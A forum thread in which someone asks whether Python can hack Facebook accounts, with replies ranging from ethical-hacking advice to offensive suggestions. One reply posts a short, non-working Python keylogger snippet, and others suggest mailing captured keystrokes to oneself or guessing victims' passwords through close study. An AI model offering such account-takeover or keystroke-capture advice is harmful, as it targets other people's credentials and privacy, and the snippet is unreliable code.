- 1
Can i hack facebook accounts from python?No offence please.
just for information
69 Réponses
+ 6
that's what we call social engineering, ok Vivas, my opinion is this, you should not learn python for hacking, follow paths of an ethical hacker if you want to do hacking things, it's fun but not easy, learn these programming languages just to serve the world not to hurt anyone.
+ 6
#To end all this, here is a keylogger written in python
import msvcrt
if msvcrt.kbhit() == True:
file = fopen("C:\\sys\\data.txt", "a")
key = str(msvcrt.getch())
file.write(key)
#Happy Hacking
+ 6
I’m offended
+ 3
Just create a keylogger script with python
+ 3
that's not social hacking it's social engineering
+ 2
if you're tricky enough, I did once, but you need a level of infinity so, if you're a beginner, just give up or waste some valuable time on reading about CGIs, you'll come up with just what I did
+ 2
that's great too
+ 2
Thanks
+ 1
You can send it via mail and the key dumps will also be mailed to you
+ 1
Thanks!!! All of you
For your advise.
+ 1
but TCP protocols are easier and safer than a regular email
+ 1
why not python lol
0
Short answer: You can
Long answer: The best way, imo, to hack a facebook account via social hacking. I would go into it but it's entirely different topic from programming.
0
Depends. When I say social hacking, I meant by studying someone so closely that you can guess their password without socially engineering a bunch of ruse to gain trust like a long con.